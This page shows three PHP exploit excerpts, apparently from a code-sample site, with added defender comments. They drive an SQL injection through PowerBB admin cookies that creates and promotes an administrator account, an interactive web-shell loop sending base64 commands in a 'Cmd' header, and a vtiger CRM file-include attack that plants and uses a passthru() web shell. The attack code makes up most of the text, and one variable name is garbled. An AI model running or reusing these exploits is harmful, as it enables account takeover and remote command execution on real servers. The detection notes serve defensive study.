Beispiel #1
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0) {
        return "";
    }
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}
// Driver part of a proof-of-concept aimed at a PowerBB admin panel (the cookie
// names below carry the PowerBB_ prefix). get() and the head of kastr() are
// defined outside this excerpt; get() is presumably (url, POST body, cookie
// string) -- confirm against the full listing.

// Target is read from STDIN; only a leading 'http://' is stripped.
$vic = str_replace('http://', '', trim(fgets(STDIN)));
if ($vic == '') {
    exit;
}
// Opened (and truncated) but never written to in the visible lines.
$log = fopen('faris.txt', 'w+');
// Five-digit suffix that makes the created username and e-mail unique per run.
$ran = rand(10000, 20000);
echo "| Adding New User\n";
// Request 1: member-creation form of admin.php, sent without a login. The third
// argument puts single quotes and "or ..." clauses into the four PowerBB_*
// cookie values, i.e. the flaw shown is that the admin check appears to build
// SQL from cookie values without escaping (inferred from the payload shape).
// Defender view: bind cookie-derived values as query parameters and keep
// credentials out of cookies. Quote characters or " or " inside PowerBB_*
// cookies in web/WAF logs are a direct signature of this request.
$add = get($vic . '/admin.php?page=member&add=1&start=1', "username=f4ris_{$ran}&password=sec4ever1337s&email=n0p1337_{$ran}@gmail.com&gender=m&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82", "PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
// The new member id is scraped from the response between 'main=1&id=' and '">'.
$myid = kastr($add, 'main=1&id=', '">');
if ($myid == '') {
    // The script's own failure hint names magic_quotes. That setting was removed
    // in PHP 5.4 and was never a substitute for parameterised queries.
    exit("| Exploitation Failed\n   - Magic_Quotes Maybe on or wrong path\n+ Exit");
}
// Forensics: accounts named f4ris_<5 digits> with an n0p1337_<5 digits>@gmail.com
// address indicate this script was run unmodified.
echo "| User Data :\n   + UserName : f4ris_{$ran}\n   + Password : sec4ever1337s\n   + User ID : {$myid}\n";
echo "| Updating User privileges\n";
// Request 2: member-edit form for the id just created, same cookie payload.
// usergroup=1 is presumably the administrator group -- verify against the
// PowerBB schema. user_title=F4r54wy and website=sec4ever.com end up in the
// member record and are further audit markers.
$update = get($vic . "admin.php?page=member&edit=1&start=1&id={$myid}", "username=f4ris_{$ran}&new_username=f4ris_{$ran}&new_password=sec4ever1337s&email=n0p1337_{$ran}@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82", "PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%");
// The response of the second request is not inspected; success is assumed.
echo "+ Exploitatin Done ;)\n";
exit;
?>



Beispiel #2
}
// Banner printed before the interactive loop starts. Whatever had to succeed
// before this point is outside the excerpt (the preceding line is a bare "}").
echo "| sec4ever shell online ;)\n";
// NOTE(review): the author's comment below makes the loop conditional on
// passthru() being available on the target. Listing it in disable_functions is
// hardening only; it does not address whatever flaw allowed the server-side
// page to be modified in the first place (not shown here).
/*
if passthru() is enabled , then get small command executer
using Egix fsock method to send and retrieve data
*/
/**
 * Send a pre-built raw HTTP request over a plain TCP socket and return the
 * whole reply.
 *
 * @param string $host   Host name or address; the port is fixed to 80 (no TLS).
 * @param string $packet Complete request text, headers and blank line included.
 * @return string|false  Everything read from the socket until the peer closes
 *                       it (status line and headers included).
 */
function http_send($host, $packet)
{
    // The return value of fsockopen() is not checked; on a failed connection the
    // calls below receive false instead of a stream.
    $sock = fsockopen($host, 80);
    fputs($sock, $packet);
    // The socket is never closed explicitly in the visible code.
    return stream_get_contents($sock);
}
// Request template for the loop below. $path, $host and $myid are set outside
// this excerpt. The request is an ordinary GET for pages.php, but it carries a
// non-standard "Cmd" request header whose %s slot is filled per iteration.
// Detection: a Cmd: header with a base64 value on requests to
// pages.php?pageid=<n> is not something a browser sends; log and alert on it.
$packet = "GET /{$path}/pages.php?pageid={$myid} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
    // Prompt text reads $_SESSION['host']; no session_start() is visible here.
    print "\ni-Hmx@" . $_SESSION['host'] . "# ";
    if (($fa = trim(fgets(STDIN))) == "exit") {
        exit("\n+ Exiting");
    }
    // Operator input is base64-encoded and placed in the Cmd header.
    $response = http_send($host, sprintf($packet, base64_encode($fa)));
    // Output is cut out of the page between the literal markers "faris>>>" and
    // "<<<faris" (kastr() is defined outside this excerpt). Presumably content
    // stored in page $myid decodes the header and wraps its output in these
    // markers -- the server side is not shown. Both markers in response bodies,
    // or in stored page content, are usable indicators.
    $final = kastr($response, "faris>>>", "<<<faris");
    echo $final;
}
/*
woooooow , that really f****d my mind
But it was funny :D
Greets to all sec4ever members
C u Guys in another Bomb ;)
*/
Beispiel #3
    return substr($string, $ini, $len);
}
// Driver part of a proof-of-concept against a vtiger CRM install under
// /vtigercrm/. faget() and the head of kastr() are defined outside this
// excerpt; faget() is presumably (url, POST body). $target is set earlier.

// The lang_crm parameter of phprint.php is given a relative path that climbs
// out of the language directory into cache/import and ends in an encoded NUL
// byte -- the shape of a local-file-include with null-byte truncation
// (inferred; phprint.php itself is not shown). Defender view: lang_crm should
// be matched against a fixed list of language codes. PHP has rejected paths
// containing NUL bytes since 5.3.4, so this form only affects older runtimes.
// Detection: "../" or "%00" in lang_crm, and unexpected files under
// cache/import/.
$me = faget($target . "/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00", "");
echo "| Testing total payload\n";
// farsawy.php is probed with a fixed pwd value; presumably it was written by a
// step outside this excerpt. Its presence on disk, or POSTs to it carrying
// pwd= and fa= fields, are indicators of compromise.
$total = faget($target . "/vtigercrm/farsawy.php", "pwd=1337");
// eregi() was deprecated in PHP 5.3 and removed in 7.0; the script as shown
// only runs on a legacy interpreter.
if (!eregi("Faris on the mic :D", $total)) {
    die("[+] Exploitation Failed\n");
}
echo "| Sending CMD test package\n";
// The fa value is base64 for a passthru() call that echoes a marker word; the
// reply is checked for that word to learn whether command execution works.
$cmd = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
if (!eregi("farsawy", $cmd)) {
    // The message names fa.php while every request here goes to farsawy.php;
    // when searching a host or its logs, look for both names.
    echo "   + Cmd couldn't executed but we can evaluate php code\n   + use :\r\n{$target}//vtigercrm/fa.php\n   Post : fa=base64code\n";
}
echo "| sec4ever shell online ;)\n\n";
// Only used for the prompt text.
$host = str_replace('https://', '', $target);
while (1) {
    echo "i-Hmx@{$host}# ";
    $c = trim(fgets(STDIN));
    if ($c == 'exit') {
        die("[+] Terminating\n");
    }
    // Operator input is wrapped in a passthru('...') string, base64-encoded and
    // posted as the fa field. Detection: fa= values that decode to PHP source.
    $payload = base64_encode("passthru('{$c}');");
    // NOTE(review): the variable name on the next two lines was masked by the
    // hosting page; as printed it is not a valid PHP identifier.
    $f**k = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa={$payload}");
    // Output is taken from between two runs of 17 hyphens in the response.
    $done = kastr($f**k, "-----------------", "-----------------");
    echo "{$done}\n";
}
/*
I dont even remember when i exploited this shit!
maybe on 2013?!
whatever , Hope its not sold as 0day in the near future xDD
*/